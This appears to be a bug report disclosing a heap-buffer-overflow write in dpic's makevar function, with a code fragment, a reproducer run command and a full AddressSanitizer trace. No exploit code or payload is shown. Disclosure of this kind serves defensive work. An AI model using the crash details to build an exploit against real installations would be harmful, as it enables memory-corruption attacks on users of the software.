        makevar("optPS", 5, PS);
        makevar("optPSfrag", 9, PSfrag);
        makevar("optPSTricks", 11, PSTricks);
        makevar("optSVG", 6, SVG);
        makevar("optTeX", 6, TeX);
        makevar("opttTeX", 7, tTeX);
        makevar("optxfig", 7, xfig);
        ...

    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=20.04
    DISTRIB_CODENAME=focal
    DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"

Attaching a reproducer: heap\_bof\_write\_test

the issue can be reproduced by running:

dpic heap_bof_write_test

With ASAN report

    =================================================================
    ==582741==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000001100 at pc 0x000000538ae3 bp 0x7ffead55dc90 sp 0x7ffead55dc88
    WRITE of size 1 at 0x621000001100 thread T0
        #0 0x538ae2 in makevar /home/bsdboy/projects/again/dpic/dpic.y:5769:48
        #1 0x511042 in mkOptionVars /home/bsdboy/projects/again/dpic/dpic.y:5748:5
        #2 0x4de391 in yyparse /home/bsdboy/projects/again/dpic/dpic.y:495:19
        #3 0x4dbcb4 in main /home/bsdboy/projects/again/dpic/main.c:1813:13
        #4 0x7f9a899740b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #5 0x41c65d in _start (/home/bsdboy/projects/again/dpic/dpic+0x41c65d)
    
    0x621000001100 is located 0 bytes to the right of 4096-byte region [0x621000000100,0x621000001100)
    allocated by thread T0 here:
        #0 0x4978bd in malloc (/home/bsdboy/projects/again/dpic/dpic+0x4978bd)
        #1 0x4dbb9d in main /home/bsdboy/projects/again/dpic/main.c:1779:11
        #2 0x7f9a899740b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bsdboy/projects/again/dpic/dpic.y:5769:48 in makevar
    Shadow bytes around the buggy address:
      0x0c427fff81d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff81e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff81f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fff8220:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==582741==ABORTING

Edited May 09, 2021 by Neeraj Pal

Tag

#pdf